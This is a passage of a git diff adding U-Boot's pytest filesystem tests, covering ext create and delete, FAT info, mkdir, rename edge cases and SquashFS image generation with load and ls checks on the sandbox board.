+ output = ubman.run_command( + 'host bind 0 %s' % fs_img) + + for i in range(0, 66): + output = ubman.run_command( + '%swrite host 0:0 %x /FILE0123456789_%02x 100' + % (fs_type, ADDR, i)) + output = ubman.run_command('%sls host 0:0 /' % fs_type) + assert('FILE0123456789_00' in output) + assert('FILE0123456789_41' in output) + + # Test Case 10b - Delete many files + for i in range(0, 66): + output = ubman.run_command( + '%srm host 0:0 /FILE0123456789_%02x' + % (fs_type, i)) + output = ubman.run_command('%sls host 0:0 /' % fs_type) + assert(not 'FILE0123456789_00' in output) + assert(not 'FILE0123456789_41' in output) + + # Test Case 10c - Create many files again + # Please note no.64 and 65 are intentionally re-created + for i in range(64, 128): + output = ubman.run_command( + '%swrite host 0:0 %x /FILE0123456789_%02x 100' + % (fs_type, ADDR, i)) + output = ubman.run_command('%sls host 0:0 /' % fs_type) + assert('FILE0123456789_40' in output) + assert('FILE0123456789_79' in output) + + assert_fs_integrity(fs_type, fs_img) + + def test_fs_ext11(self, ubman, fs_obj_ext): + """ + 'Test Case 11 - create/delete as many directories under non-root + directory as amount of directory entries goes beyond one cluster size)' + """ + fs_type,fs_img,md5val = fs_obj_ext + with ubman.log.section('Test Case 11 - create/delete (many)'): + # Test Case 11a - Create many files + # Please note that the size of directory entry is 32 bytes. + # So one typical cluster may holds 64 (2048/32) entries. + output = ubman.run_command( + 'host bind 0 %s' % fs_img) + + for i in range(0, 66): + output = ubman.run_command( + '%swrite host 0:0 %x /dir1/FILE0123456789_%02x 100' + % (fs_type, ADDR, i)) + output = ubman.run_command('%sls host 0:0 /dir1' % fs_type) + assert('FILE0123456789_00' in output) + assert('FILE0123456789_41' in output) + + # Test Case 11b - Delete many files + for i in range(0, 66): + output = ubman.run_command( + '%srm host 0:0 /dir1/FILE0123456789_%02x' + % (fs_type, i)) + output = ubman.run_command('%sls host 0:0 /dir1' % fs_type) + assert(not 'FILE0123456789_00' in output) + assert(not 'FILE0123456789_41' in output) + + # Test Case 11c - Create many files again + # Please note no.64 and 65 are intentionally re-created + for i in range(64, 128): + output = ubman.run_command( + '%swrite host 0:0 %x /dir1/FILE0123456789_%02x 100' + % (fs_type, ADDR, i)) + output = ubman.run_command('%sls host 0:0 /dir1' % fs_type) + assert('FILE0123456789_40' in output) + assert('FILE0123456789_79' in output) + + assert_fs_integrity(fs_type, fs_img) + + def test_fs_ext12(self, ubman, fs_obj_ext): + """ + Test Case 12 - write plain and mangle file + """ + fs_type,fs_img,md5val = fs_obj_ext + with ubman.log.section('Test Case 12 - write plain and mangle file'): + # Test Case 12a - Check if command successfully returned + output = ubman.run_command_list([ + 'host bind 0 %s' % fs_img, + '%swrite host 0:0 %x /%s 0' + % (fs_type, ADDR, PLAIN_FILE), + '%swrite host 0:0 %x /%s 0' + % (fs_type, ADDR, MANGLE_FILE)]) + assert('0 bytes written' in ''.join(output)) + # Test Case 12b - Read file system content + output = check_output('mdir -i %s' % fs_img, shell=True).decode() + # Test Case 12c - Check if short filename is not mangled + assert(str2fat(PLAIN_FILE) in ''.join(output)) + # Test Case 12d - Check if long filename is mangled + assert(str2fat(MANGLE_FILE) in ''.join(output)) + + assert_fs_integrity(fs_type, fs_img) diff --git a/test/py/tests/test_fs/test_fs_cmd.py b/test/py/tests/test_fs/test_fs_cmd.py new file mode 100644 
index 00000000000..c925547c7bc
--- /dev/null
+++ b/test/py/tests/test_fs/test_fs_cmd.py
@@ -0,0 +1,13 @@
+# SPDX-License-Identifier: GPL-2.0
+# Copyright (C) 2020
+# Niel Fourie, DENX Software Engineering, lusus@denx.de
+
+import pytest
+
+@pytest.mark.boardspec('sandbox')
+@pytest.mark.buildconfigspec('cmd_fs_generic')
+def test_fstypes(ubman):
+    """Test that `fstypes` prints a result which includes `sandbox`."""
+    output = ubman.run_command('fstypes')
+    assert "Supported filesystems:" in output
+    assert "sandbox" in output
diff --git a/test/py/tests/test_fs/test_fs_fat.py b/test/py/tests/test_fs/test_fs_fat.py
new file mode 100644
index 00000000000..b61d8ab9eac
--- /dev/null
+++ b/test/py/tests/test_fs/test_fs_fat.py
@@ -0,0 +1,25 @@
+# SPDX-License-Identifier: GPL-2.0+
+# Copyright (c) 2023 Weidmüller Interface GmbH & Co. KG
+# Author: Christian Taedcke <christian.taedcke@weidmueller.com>
+#
+# U-Boot File System: FAT Test
+
+"""
+This test verifies FAT-specific file system behaviour.
+"""
+
+import pytest
+import re
+
+@pytest.mark.boardspec('sandbox')
+@pytest.mark.slow
+class TestFsFat(object):
+    def test_fs_fat1(self, ubman, fs_obj_fat):
+        """Test that `fatinfo` reports the filesystem type of the test image."""
+        fs_type,fs_img = fs_obj_fat
+        with ubman.log.section('Test Case 1 - fatinfo'):
+            # Test Case 1 - fatinfo
+            output = ubman.run_command_list([
+                'host bind 0 %s' % fs_img,
+                'fatinfo host 0:0'])
+            assert(re.search('Filesystem: %s' % fs_type.upper(), ''.join(output)))
diff --git a/test/py/tests/test_fs/test_mkdir.py b/test/py/tests/test_fs/test_mkdir.py
new file mode 100644
index 00000000000..df680a87d57
--- /dev/null
+++ b/test/py/tests/test_fs/test_mkdir.py
@@ -0,0 +1,121 @@
+# SPDX-License-Identifier: GPL-2.0+
+# Copyright (c) 2018, Linaro Limited
+# Author: Takahiro Akashi <takahiro.akashi@linaro.org>
+#
+# U-Boot File System:mkdir Test
+
+"""
+This test verifies mkdir operation on file system.
+""" + +import pytest +from fstest_helpers import assert_fs_integrity + +@pytest.mark.boardspec('sandbox') +@pytest.mark.slow +class TestMkdir(object): + def test_mkdir1(self, ubman, fs_obj_mkdir): + """ + Test Case 1 - create a directory under a root + """ + fs_type,fs_img = fs_obj_mkdir + with ubman.log.section('Test Case 1 - mkdir'): + output = ubman.run_command_list([ + 'host bind 0 %s' % fs_img, + '%smkdir host 0:0 dir1' % fs_type, + '%sls host 0:0 /' % fs_type]) + assert('dir1/' in ''.join(output)) + + output = ubman.run_command( + '%sls host 0:0 dir1' % fs_type) + assert('./' in output) + assert('../' in output) + assert_fs_integrity(fs_type, fs_img) + + + def test_mkdir2(self, ubman, fs_obj_mkdir): + """ + Test Case 2 - create a directory under a sub-directory + """ + fs_type,fs_img = fs_obj_mkdir + with ubman.log.section('Test Case 2 - mkdir (sub-sub directory)'): + output = ubman.run_command_list([ + 'host bind 0 %s' % fs_img, + '%smkdir host 0:0 dir1/dir2' % fs_type, + '%sls host 0:0 dir1' % fs_type]) + assert('dir2/' in ''.join(output)) + + output = ubman.run_command( + '%sls host 0:0 dir1/dir2' % fs_type) + assert('./' in output) + assert('../' in output) + assert_fs_integrity(fs_type, fs_img) + + def test_mkdir3(self, ubman, fs_obj_mkdir): + """ + Test Case 3 - trying to create a directory with a non-existing + path should fail + """ + fs_type,fs_img = fs_obj_mkdir + with ubman.log.section('Test Case 3 - mkdir (non-existing path)'): + output = ubman.run_command_list([ + 'host bind 0 %s' % fs_img, + '%smkdir host 0:0 none/dir3' % fs_type]) + assert('Unable to create a directory' in ''.join(output)) + assert_fs_integrity(fs_type, fs_img) + + def test_mkdir4(self, ubman, fs_obj_mkdir): + """ + Test Case 4 - trying to create "." should fail + """ + fs_type,fs_img = fs_obj_mkdir + with ubman.log.section('Test Case 4 - mkdir (".")'): + output = ubman.run_command_list([ + 'host bind 0 %s' % fs_img, + '%smkdir host 0:0 .' % fs_type]) + assert('Unable to create a directory' in ''.join(output)) + assert_fs_integrity(fs_type, fs_img) + + def test_mkdir5(self, ubman, fs_obj_mkdir): + """ + Test Case 5 - trying to create ".." should fail + """ + fs_type,fs_img = fs_obj_mkdir + with ubman.log.section('Test Case 5 - mkdir ("..")'): + output = ubman.run_command_list([ + 'host bind 0 %s' % fs_img, + '%smkdir host 0:0 ..' % fs_type]) + assert('Unable to create a directory' in ''.join(output)) + assert_fs_integrity(fs_type, fs_img) + + def test_mkdir6(self, ubman, fs_obj_mkdir): + """ + 'Test Case 6 - create as many directories as amount of directory + entries goes beyond a cluster size)' + """ + fs_type,fs_img = fs_obj_mkdir + with ubman.log.section('Test Case 6 - mkdir (create many)'): + output = ubman.run_command_list([ + 'host bind 0 %s' % fs_img, + '%smkdir host 0:0 dir6' % fs_type, + '%sls host 0:0 /' % fs_type]) + assert('dir6/' in ''.join(output)) + + for i in range(0, 20): + output = ubman.run_command( + '%smkdir host 0:0 dir6/0123456789abcdef%02x' + % (fs_type, i)) + output = ubman.run_command('%sls host 0:0 dir6' % fs_type) + assert('0123456789abcdef00/' in output) + assert('0123456789abcdef13/' in output) + + output = ubman.run_command( + '%sls host 0:0 dir6/0123456789abcdef13/.' % fs_type) + assert('./' in output) + assert('../' in output) + + output = ubman.run_command( + '%sls host 0:0 dir6/0123456789abcdef13/..' 
% fs_type) + assert('0123456789abcdef00/' in output) + assert('0123456789abcdef13/' in output) + assert_fs_integrity(fs_type, fs_img) diff --git a/test/py/tests/test_fs/test_rename.py b/test/py/tests/test_fs/test_rename.py new file mode 100644 index 00000000000..e36cff99bb7 --- /dev/null +++ b/test/py/tests/test_fs/test_rename.py @@ -0,0 +1,372 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright 2025 Gabriel Dalimonte <gabriel.dalimonte@gmail.com> +# +# U-Boot File System:rename Test + + +import pytest + +from fstest_defs import * +from fstest_helpers import assert_fs_integrity + +@pytest.mark.boardspec('sandbox') +@pytest.mark.slow +class TestRename(object): + def test_rename1(self, ubman, fs_obj_rename): + """ + Test Case 1 - rename a file (successful mv) + """ + fs_type, fs_img, md5val = fs_obj_rename + with ubman.log.section('Test Case 1 - rename a file'): + d = 'test1' + src = '%s/file1' % d + dst = '%s/file2' % d + output = ubman.run_command_list([ + 'host bind 0 %s' % fs_img, + 'setenv filesize', + 'mv host 0:0 %s %s' % (src, dst), + ]) + assert('' == ''.join(output)) + + output = ubman.run_command_list([ + 'load host 0:0 %x /%s' % (ADDR, dst), + 'printenv filesize']) + assert('filesize=400' in output) + + output = ubman.run_command_list([ + 'ls host 0:0 %s' % (d), + ]) + assert('file1' not in ''.join(output)) + + output = ubman.run_command_list([ + 'md5sum %x $filesize' % ADDR, + 'setenv filesize']) + assert(md5val['test1'] in ''.join(output)) + assert_fs_integrity(fs_type, fs_img) + + def test_rename2(self, ubman, fs_obj_rename): + """ + Test Case 2 - rename a file to an existing file (successful mv) + """ + fs_type, fs_img, md5val = fs_obj_rename + with ubman.log.section('Test Case 2 - rename a file to an existing file'): + d = 'test2' + src = '%s/file1' % d + dst = '%s/file_exist' % d + output = ubman.run_command_list([ + 'host bind 0 %s' % fs_img, + 'setenv filesize', + 'mv host 0:0 %s %s' % (src, dst), + ]) + assert('' == ''.join(output)) + + output = ubman.run_command_list([ + 'load host 0:0 %x /%s' % (ADDR, dst), + 'printenv filesize']) + assert('filesize=400' in output) + + output = ubman.run_command_list([ + 'ls host 0:0 %s' % (d), + ]) + assert('file1' not in ''.join(output)) + + output = ubman.run_command_list([ + 'md5sum %x $filesize' % ADDR, + 'setenv filesize']) + assert(md5val['test2'] in ''.join(output)) + assert_fs_integrity(fs_type, fs_img) + + def test_rename3(self, ubman, fs_obj_rename): + """ + Test Case 3 - rename a directory (successful mv) + """ + fs_type, fs_img, md5val = fs_obj_rename + with ubman.log.section('Test Case 3 - rename a directory'): + d = 'test3' + src = '%s/dir1' % d + dst = '%s/dir2' % d + output = ubman.run_command_list([ + 'host bind 0 %s' % fs_img, + 'setenv filesize', + 'mv host 0:0 %s %s' % (src, dst), + ]) + assert('' == ''.join(output)) + + output = ubman.run_command_list([ + 'load host 0:0 %x /%s/file1' % (ADDR, dst), + 'printenv filesize']) + assert('filesize=400' in output) + + output = ubman.run_command_list([ + 'ls host 0:0 %s' % (d), + ]) + assert('dir1' not in ''.join(output)) + + output = ubman.run_command_list([ + 'md5sum %x $filesize' % ADDR, + 'setenv filesize']) + assert(md5val['test3'] in ''.join(output)) + assert_fs_integrity(fs_type, fs_img) + + def test_rename4(self, ubman, fs_obj_rename): + """ + Test Case 4 - rename a directory to an existing directory (successful + mv) + """ + fs_type, fs_img, md5val = fs_obj_rename + with ubman.log.section('Test Case 4 - rename a directory to an existing directory'): + d = 'test4' 
+ src = '%s/dir1' % d + dst = '%s/dir2' % d + output = ubman.run_command_list([ + 'host bind 0 %s' % fs_img, + 'setenv filesize', + 'mv host 0:0 %s %s' % (src, dst), + ]) + assert('' == ''.join(output)) + + output = ubman.run_command_list([ + 'load host 0:0 %x /%s/dir1/file1' % (ADDR, dst), + 'printenv filesize']) + assert('filesize=400' in output) + + output = ubman.run_command_list([ + 'ls host 0:0 %s' % (d), + ]) + assert('dir1' not in ''.join(output)) + + output = ubman.run_command_list([ + 'md5sum %x $filesize' % ADDR, + 'setenv filesize']) + assert(md5val['test4'] in ''.join(output)) + assert_fs_integrity(fs_type, fs_img) + + def test_rename5(self, ubman, fs_obj_rename): + """ + Test Case 5 - rename a directory to an existing file (failed mv) + """ + fs_type, fs_img, md5val = fs_obj_rename + with ubman.log.section('Test Case 5 - rename a directory to an existing file'): + d = 'test5' + src = '%s/dir1' % d + dst = '%s/file2' % d + output = ubman.run_command_list([ + 'host bind 0 %s' % fs_img, + 'setenv filesize', + 'mv host 0:0 %s %s' % (src, dst), + ]) + assert('' == ''.join(output)) + + output = ubman.run_command_list([ + 'ls host 0:0 %s' % (d), + ]) + assert('dir1' in ''.join(output)) + assert('file2' in ''.join(output)) + + output = ubman.run_command_list([ + 'load host 0:0 %x /%s' % (ADDR, dst), + 'printenv filesize']) + assert('filesize=400' in output) + + output = ubman.run_command_list([ + 'md5sum %x $filesize' % ADDR, + 'setenv filesize']) + assert(md5val['test5'] in ''.join(output)) + assert_fs_integrity(fs_type, fs_img) + + def test_rename6(self, ubman, fs_obj_rename): + """ + Test Case 6 - rename a file to an existing empty directory (failed mv) + """ + fs_type, fs_img, md5val = fs_obj_rename + with ubman.log.section('Test Case 6 - rename a file to an existing empty directory'): + d = 'test6' + src = '%s/existing' % d + dst = '%s/dir2' % d + output = ubman.run_command_list([ + 'host bind 0 %s' % fs_img, + 'setenv filesize', + 'mv host 0:0 %s %s' % (src, dst), + ]) + assert('' == ''.join(output)) + + output = ubman.run_command_list([ + 'load host 0:0 %x /%s' % (ADDR, src), + 'printenv filesize']) + assert('filesize=400' in output) + + output = ubman.run_command_list([ + 'ls host 0:0 %s' % (d), + ]) + assert('dir2' in ''.join(output)) + assert('existing' in ''.join(output)) + + output = ubman.run_command_list([ + 'md5sum %x $filesize' % ADDR, + 'setenv filesize']) + assert(md5val['test6'] in ''.join(output)) + assert_fs_integrity(fs_type, fs_img) + + def test_rename7(self, ubman, fs_obj_rename): + """ + Test Case 7 - rename a directory to a non-empty directory (failed mv) + """ + fs_type, fs_img, md5val = fs_obj_rename + with ubman.log.section('Test Case 7 - rename a directory to a non-empty directory'): + d = 'test7' + src = '%s/dir1' % d + dst = '%s/dir2' % d + output = ubman.run_command_list([ + 'host bind 0 %s' % fs_img, + 'setenv filesize', + 'mv host 0:0 %s %s' % (src, dst), + ]) + assert('' == ''.join(output)) + + output = ubman.run_command_list([ + 'load host 0:0 %x /%s/dir1/file1' % (ADDR, dst), + 'printenv filesize']) + assert('filesize=400' in output) + + output = ubman.run_command_list([ + 'ls host 0:0 %s' % (d), + ]) + assert('dir1' in ''.join(output)) + assert('dir2' in ''.join(output)) + + output = ubman.run_command_list([ + 'md5sum %x $filesize' % ADDR, + 'setenv filesize']) + assert(md5val['test7'] in ''.join(output)) + assert_fs_integrity(fs_type, fs_img) + + def test_rename8(self, ubman, fs_obj_rename): + """ + Test Case 8 - rename a directory inside 
itself (failed mv) + """ + fs_type, fs_img, md5val = fs_obj_rename + with ubman.log.section('Test Case 8 - rename a directory inside itself'): + d = 'test8' + src = '%s/dir1' % d + dst = '%s/dir1/dir1' % d + output = ubman.run_command_list([ + 'host bind 0 %s' % fs_img, + 'setenv filesize', + 'mv host 0:0 %s %s' % (src, dst), + ]) + assert('' == ''.join(output)) + + output = ubman.run_command_list([ + 'load host 0:0 %x /%s/file1' % (ADDR, src), + 'printenv filesize']) + assert('filesize=400' in output) + + output = ubman.run_command_list([ + 'ls host 0:0 %s' % (d), + ]) + assert('dir1' in ''.join(output)) + + output = ubman.run_command_list([ + 'ls host 0:0 %s' % (src), + ]) + assert('file1' in ''.join(output)) + assert('dir1' not in ''.join(output)) + + output = ubman.run_command_list([ + 'md5sum %x $filesize' % ADDR, + 'setenv filesize']) + assert(md5val['test8'] in ''.join(output)) + assert_fs_integrity(fs_type, fs_img) + + def test_rename9(self, ubman, fs_obj_rename): + """ + Test Case 9 - rename a directory inside itself with backtracks (failed + mv) + """ + fs_type, fs_img, md5val = fs_obj_rename + with ubman.log.section('Test Case 9 - rename a directory inside itself with backtracks'): + d = 'test9' + src = '%s/dir1/nested' % d + dst = '%s/dir1/nested/inner/./../../../dir1/nested/inner/another' % d + output = ubman.run_command_list([ + 'host bind 0 %s' % fs_img, + 'setenv filesize', + 'mv host 0:0 %s %s' % (src, dst), + ]) + assert('' == ''.join(output)) + + output = ubman.run_command_list([ + 'ls host 0:0 %s/dir1' % (d), + ]) + assert('nested' in ''.join(output)) + + output = ubman.run_command_list([ + 'ls host 0:0 %s' % (src), + ]) + assert('inner' in ''.join(output)) + assert('nested' not in ''.join(output)) + assert_fs_integrity(fs_type, fs_img) + + def test_rename10(self, ubman, fs_obj_rename): + """ + Test Case 10 - rename a file to itself (successful mv) + """ + fs_type, fs_img, md5val = fs_obj_rename + with ubman.log.section('Test Case 10 - rename a file to itself'): + d = 'test10' + src = '%s/file1' % d + output = ubman.run_command_list([ + 'host bind 0 %s' % fs_img, + 'setenv filesize', + 'mv host 0:0 %s %s' % (src, src), + ]) + assert('' == ''.join(output)) + + output = ubman.run_command_list([ + 'load host 0:0 %x /%s' % (ADDR, src), + 'printenv filesize']) + assert('filesize=400' in output) + + output = ubman.run_command_list([ + 'ls host 0:0 %s' % (d), + ]) + assert('file1' in ''.join(output)) + + output = ubman.run_command_list([ + 'md5sum %x $filesize' % ADDR, + 'setenv filesize']) + assert(md5val['test10'] in ''.join(output)) + assert_fs_integrity(fs_type, fs_img) + + def test_rename11(self, ubman, fs_obj_rename): + """ + Test Case 11 - rename a directory to itself (successful mv) + """ + fs_type, fs_img, md5val = fs_obj_rename + with ubman.log.section('Test Case 11 - rename a directory to itself'): + # / at the end here is intentional. 
Ensures trailing / doesn't + # affect mv producing an updated dst path for fs_rename + d = 'test11/' + src = '%sdir1' % d + output = ubman.run_command_list([ + 'host bind 0 %s' % fs_img, + 'setenv filesize', + 'mv host 0:0 %s %s' % (src, d), + ]) + assert('' == ''.join(output)) + + output = ubman.run_command_list([ + 'load host 0:0 %x /%s/file1' % (ADDR, src), + 'printenv filesize']) + assert('filesize=400' in output) + + output = ubman.run_command_list([ + 'ls host 0:0 %s' % (d), + ]) + assert('dir1' in ''.join(output)) + + output = ubman.run_command_list([ + 'md5sum %x $filesize' % ADDR, + 'setenv filesize']) + assert(md5val['test11'] in ''.join(output)) + assert_fs_integrity(fs_type, fs_img) diff --git a/test/py/tests/test_fs/test_squashfs/sqfs_common.py b/test/py/tests/test_fs/test_squashfs/sqfs_common.py new file mode 100644 index 00000000000..d1621dcce3a --- /dev/null +++ b/test/py/tests/test_fs/test_squashfs/sqfs_common.py @@ -0,0 +1,204 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2020 Bootlin +# Author: Joao Marcos Costa <joaomarcos.costa@bootlin.com> + +import os +import shutil +import subprocess + +""" standard test images table: Each table item is a key:value pair +representing the output image name and its respective mksquashfs options. +This table should be modified only when adding support for new compression +algorithms. The 'default' case takes no options but the input and output +names, so it must be assigned with an empty string. +""" +STANDARD_TABLE = { + 'default' : '', + 'lzo_comp_frag' : '', + 'lzo_frag' : '', + 'lzo_no_frag' : '', + 'zstd_comp_frag' : '', + 'zstd_frag' : '', + 'zstd_no_frag' : '', + 'gzip_comp_frag' : '', + 'gzip_frag' : '', + 'gzip_no_frag' : '' +} + +""" EXTRA_TABLE: Set this table's keys and values if you want to make squashfs +images with your own customized options. +""" +EXTRA_TABLE = {} + +# path to source directory used to make squashfs test images +SQFS_SRC_DIR = 'sqfs_src_dir' + +def get_opts_list(): + """ Combines fragmentation and compression options into a list of strings. + + opts_list's firts item is an empty string as STANDARD_TABLE's first item is + the 'default' case. + + Returns: + A list of strings whose items are formed by a compression and a + fragmentation option joined by a whitespace. + """ + # supported compression options only + comp_opts = ['-comp lzo', '-comp zstd', '-comp gzip'] + # file fragmentation options + frag_opts = ['-always-use-fragments', '-always-use-fragments -noF', '-no-fragments'] + + opts_list = [' '] + for comp_opt in comp_opts: + for frag_opt in frag_opts: + opts_list.append(' '.join([comp_opt, frag_opt])) + + return opts_list + +def init_standard_table(): + """ Initializes STANDARD_TABLE values. + + STANDARD_TABLE's keys are pre-defined, and init_standard_table() assigns + the right value for each one of them. + """ + opts_list = get_opts_list() + + for key, value in zip(STANDARD_TABLE.keys(), opts_list): + STANDARD_TABLE[key] = value + +def generate_file(file_name, file_size): + """ Generates a file filled with 'x'. + + Args: + file_name: the file's name. + file_size: the content's length and therefore the file size. + """ + content = 'x' * file_size + + file = open(file_name, 'w') + file.write(content) + file.close() + +def generate_sqfs_src_dir(build_dir): + """ Generates the source directory used to make the SquashFS images. 
+ + The source directory is generated at build_dir, and it has the following + structure: + sqfs_src_dir/ + ├── empty-dir/ + ├── f1000 + ├── f4096 + ├── f5096 + ├── subdir/ + │  └── subdir-file + └── sym -> subdir + + 3 directories, 4 files + + The files in the root dir. are prefixed with an 'f' followed by its size. + + Args: + build_dir: u-boot's build-sandbox directory. + """ + + root = os.path.join(build_dir, SQFS_SRC_DIR) + # make root directory + os.makedirs(root) + + # 4096: minimum block size + file_name = 'f4096' + generate_file(os.path.join(root, file_name), 4096) + + # 5096: minimum block size + 1000 chars (fragment) + file_name = 'f5096' + generate_file(os.path.join(root, file_name), 5096) + + # 1000: less than minimum block size (fragment only) + file_name = 'f1000' + generate_file(os.path.join(root, file_name), 1000) + + # sub-directory with a single file inside + subdir_path = os.path.join(root, 'subdir') + os.makedirs(subdir_path) + generate_file(os.path.join(subdir_path, 'subdir-file'), 100) + + # symlink (target: sub-directory) + os.symlink('subdir', os.path.join(root, 'sym')) + + # empty directory + os.makedirs(os.path.join(root, 'empty-dir')) + +def mksquashfs(args): + """ Runs mksquashfs command. + + Args: + args: mksquashfs options (e.g.: compression and fragmentation). + """ + subprocess.run(['mksquashfs ' + args], shell=True, check=True, + stdout=subprocess.DEVNULL) + +def get_mksquashfs_version(): + """ Parses the output of mksquashfs -version. + + Returns: + mksquashfs's version as a float. + """ + out = subprocess.run(['mksquashfs -version'], shell=True, check=True, + capture_output=True, text=True) + # 'out' is: mksquashfs version X (yyyy/mm/dd) ... + return out.stdout.split()[2].split('.')[0:2] + +def check_mksquashfs_version(): + """ Checks if mksquashfs meets the required version. """ + + version = get_mksquashfs_version(); + if int(version[0]) < 4 or int(version[0]) == 4 and int(version[1]) < 4 : + print('Error: mksquashfs is too old, required version: 4.4') + raise AssertionError + +def make_all_images(build_dir): + """ Makes the SquashFS images used in the test suite. + + The image names and respective mksquashfs options are defined in STANDARD_TABLE + and EXTRA_TABLE. The destination is defined by 'build_dir'. + + Args: + build_dir: u-boot's build-sandbox directory. + """ + + init_standard_table() + input_path = os.path.join(build_dir, SQFS_SRC_DIR) + + # make squashfs images according to STANDARD_TABLE + for out, opts in zip(STANDARD_TABLE.keys(), STANDARD_TABLE.values()): + output_path = os.path.join(build_dir, out) + mksquashfs(' '.join([input_path, output_path, opts])) + + # make squashfs images according to EXTRA_TABLE + for out, opts in zip(EXTRA_TABLE.keys(), EXTRA_TABLE.values()): + output_path = os.path.join(build_dir, out) + mksquashfs(' '.join([input_path, output_path, opts])) + +def clean_all_images(build_dir): + """ Deletes the SquashFS images at build_dir. + + Args: + build_dir: u-boot's build-sandbox directory. + """ + + for image_name in STANDARD_TABLE: + image_path = os.path.join(build_dir, image_name) + os.remove(image_path) + + for image_name in EXTRA_TABLE: + image_path = os.path.join(build_dir, image_name) + os.remove(image_path) + +def clean_sqfs_src_dir(build_dir): + """ Deletes the source directory at build_dir. + + Args: + build_dir: u-boot's build-sandbox directory. 
+ """ + path = os.path.join(build_dir, SQFS_SRC_DIR) + shutil.rmtree(path) diff --git a/test/py/tests/test_fs/test_squashfs/test_sqfs_load.py b/test/py/tests/test_fs/test_squashfs/test_sqfs_load.py new file mode 100644 index 00000000000..33093f61ac3 --- /dev/null +++ b/test/py/tests/test_fs/test_squashfs/test_sqfs_load.py @@ -0,0 +1,154 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2020 Bootlin +# Author: Joao Marcos Costa <joaomarcos.costa@bootlin.com> + +import os +import subprocess +import pytest + +from sqfs_common import SQFS_SRC_DIR, STANDARD_TABLE +from sqfs_common import generate_sqfs_src_dir, make_all_images +from sqfs_common import clean_sqfs_src_dir, clean_all_images +from sqfs_common import check_mksquashfs_version + +@pytest.mark.requiredtool('md5sum') +def original_md5sum(path): + """ Runs md5sum command. + + Args: + path: path to original file. + Returns: + The original file's checksum as a string. + """ + + out = subprocess.run(['md5sum ' + path], shell=True, check=True, + capture_output=True, text=True) + checksum = out.stdout.split()[0] + + return checksum + +def uboot_md5sum(ubman, address, count): + """ Runs U-Boot's md5sum command. + + Args: + ubman: provides the means to interact with U-Boot's console. + address: address where the file was loaded (e.g.: $kernel_addr_r). + count: file's size. It was named 'count' to match md5sum's respective + argument name. + Returns: + The checksum of the file loaded with sqfsload as a string. + """ + + out = ubman.run_command('md5sum {} {}'.format(address, count)) + checksum = out.split()[-1] + + return checksum + +def sqfs_load_files(ubman, files, sizes, address): + """ Loads files and asserts their checksums. + + Args: + ubman: provides the means to interact with U-Boot's console. + files: list of files to be loaded. + sizes: the sizes of each file. + address: the address where the files should be loaded. + """ + build_dir = ubman.config.build_dir + for (file, size) in zip(files, sizes): + out = ubman.run_command('sqfsload host 0 {} {}'.format(address, file)) + + # check if the right amount of bytes was read + assert size in out + + # compare original file's checksum against u-boot's + u_boot_checksum = uboot_md5sum(ubman, address, hex(int(size))) + original_file_path = os.path.join(build_dir, SQFS_SRC_DIR + '/' + file) + original_checksum = original_md5sum(original_file_path) + assert u_boot_checksum == original_checksum + +def sqfs_load_files_at_root(ubman): + """ Calls sqfs_load_files passing the files at the SquashFS image's root. + + Args: + ubman: provides the means to interact with U-Boot's console. + """ + + files = ['f4096', 'f5096', 'f1000'] + sizes = ['4096', '5096', '1000'] + address = '$kernel_addr_r' + sqfs_load_files(ubman, files, sizes, address) + +def sqfs_load_files_at_subdir(ubman): + """ Calls sqfs_load_files passing the files at the SquashFS image's subdir. + + This test checks if the path resolution works, since the file is not at the + root directory. + + Args: + ubman: provides the means to interact with U-Boot's console. + """ + files = ['subdir/subdir-file'] + sizes = ['100'] + address = '$kernel_addr_r' + sqfs_load_files(ubman, files, sizes, address) + +def sqfs_load_non_existent_file(ubman): + """ Calls sqfs_load_files passing an non-existent file to raise an error. + + This test checks if the SquashFS support won't crash if it doesn't find the + specified file. + + Args: + ubman: provides the means to interact with U-Boot's console. 
+ """ + address = '$kernel_addr_r' + file = 'non-existent' + out = ubman.run_command('sqfsload host 0 {} {}'.format(address, file)) + assert 'Failed to load' in out + +def sqfs_run_all_load_tests(ubman): + """ Runs all the previously defined test cases. + + Args: + ubman: provides the means to interact with U-Boot's console. + """ + sqfs_load_files_at_root(ubman) + sqfs_load_files_at_subdir(ubman) + sqfs_load_non_existent_file(ubman) + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('cmd_fs_generic') +@pytest.mark.buildconfigspec('cmd_squashfs') +@pytest.mark.buildconfigspec('fs_squashfs') +@pytest.mark.requiredtool('mksquashfs') +def test_sqfs_load(ubman): + """ Executes the sqfsload test suite. + + First, it generates the SquashFS images, then it runs the test cases and + finally cleans the workspace. If an exception is raised, the workspace is + cleaned before exiting. + + Args: + ubman: provides the means to interact with U-Boot's console. + """ + build_dir = ubman.config.build_dir + + # setup test environment + check_mksquashfs_version() + generate_sqfs_src_dir(build_dir) + make_all_images(build_dir) + + # run all tests for each image + for image in STANDARD_TABLE: + try: + image_path = os.path.join(build_dir, image) + ubman.run_command('host bind 0 {}'.format(image_path)) + sqfs_run_all_load_tests(ubman) + except: + clean_all_images(build_dir) + clean_sqfs_src_dir(build_dir) + raise AssertionError + + # clean test environment + clean_all_images(build_dir) + clean_sqfs_src_dir(build_dir) diff --git a/test/py/tests/test_fs/test_squashfs/test_sqfs_ls.py b/test/py/tests/test_fs/test_squashfs/test_sqfs_ls.py new file mode 100644 index 00000000000..adda3b98cda --- /dev/null +++ b/test/py/tests/test_fs/test_squashfs/test_sqfs_ls.py @@ -0,0 +1,148 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2020 Bootlin +# Author: Joao Marcos Costa <joaomarcos.costa@bootlin.com> + +import os +import pytest + +from sqfs_common import STANDARD_TABLE +from sqfs_common import generate_sqfs_src_dir, make_all_images +from sqfs_common import clean_sqfs_src_dir, clean_all_images +from sqfs_common import check_mksquashfs_version + +def sqfs_ls_at_root(ubman): + """ Runs sqfsls at image's root. + + This test checks if all the present files and directories were listed. Also, + it checks if passing the slash or not changes the output, which it shouldn't. + + Args: + ubman: provides the means to interact with U-Boot's console. + """ + + no_slash = ubman.run_command('sqfsls host 0') + slash = ubman.run_command('sqfsls host 0 /') + assert no_slash == slash + + expected_lines = ['empty-dir/', '1000 f1000', '4096 f4096', '5096 f5096', + 'subdir/', '<SYM> sym', '4 file(s), 2 dir(s)'] + + output = ubman.run_command('sqfsls host 0') + for line in expected_lines: + assert line in output + +def sqfs_ls_at_empty_dir(ubman): + """ Runs 